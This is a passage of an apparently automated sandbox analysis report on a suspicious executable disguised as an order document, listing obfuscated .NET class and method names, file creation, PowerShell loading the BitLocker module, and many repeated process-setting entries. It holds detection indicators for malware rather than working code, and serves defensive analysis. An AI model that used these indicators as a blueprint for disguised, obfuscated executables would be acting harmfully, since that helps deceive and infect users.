            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.csHigh entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, PDcgpXSj1qbu54T7XK.csHigh entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, SVVM01mpZ25hLYZ4RI.csHigh entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, p3OJO3Xj3WA6yFT9bG2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, M9EhpapaLJXqtHovTI.csHigh entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, LSsALD7k0xoq1ICkoe.csHigh entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, oZDxN9X20Mgb54aR6pJ.csHigh entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, o26AjyZyl3gqQ7oXg6.csHigh entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, GL6gb9sBp7fYqEvq2Q.csHigh entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, fEPxOLqyxV0ISeYYpd.csHigh entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, l7GCTdzeZ7vklkKi9T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, OkXB9a4YdprsSPYtim.csHigh entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, FbfCiLHAwcB6jTs026.csHigh entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.csHigh entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M0wsTL3r3fuRc7Boqc.csHigh entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, h36j66y444CnFBKR7G.csHigh entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, Eir6qOiBX37WHUEZgT.csHigh entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, ETASaYckrPsNWXkt9U.csHigh entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, RS0m6OMYkClxmqgBal.csHigh entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, lQOi7u0sTIIXy3UBMv.csHigh entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, MZTkqV9XjytaaqfcxB.csHigh entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.csHigh entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, PDcgpXSj1qbu54T7XK.csHigh entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, SVVM01mpZ25hLYZ4RI.csHigh entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, p3OJO3Xj3WA6yFT9bG2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, M9EhpapaLJXqtHovTI.csHigh entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, LSsALD7k0xoq1ICkoe.csHigh entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, oZDxN9X20Mgb54aR6pJ.csHigh entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, o26AjyZyl3gqQ7oXg6.csHigh entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, GL6gb9sBp7fYqEvq2Q.csHigh entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, fEPxOLqyxV0ISeYYpd.csHigh entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, l7GCTdzeZ7vklkKi9T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile created: \art_spec. 4008670601 aztek order _ 7.3.2024.exe
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile created: \art_spec. 4008670601 aztek order _ 7.3.2024.exeJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile created: \art_spec. 4008670601 aztek order _ 7.3.2024.exeJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
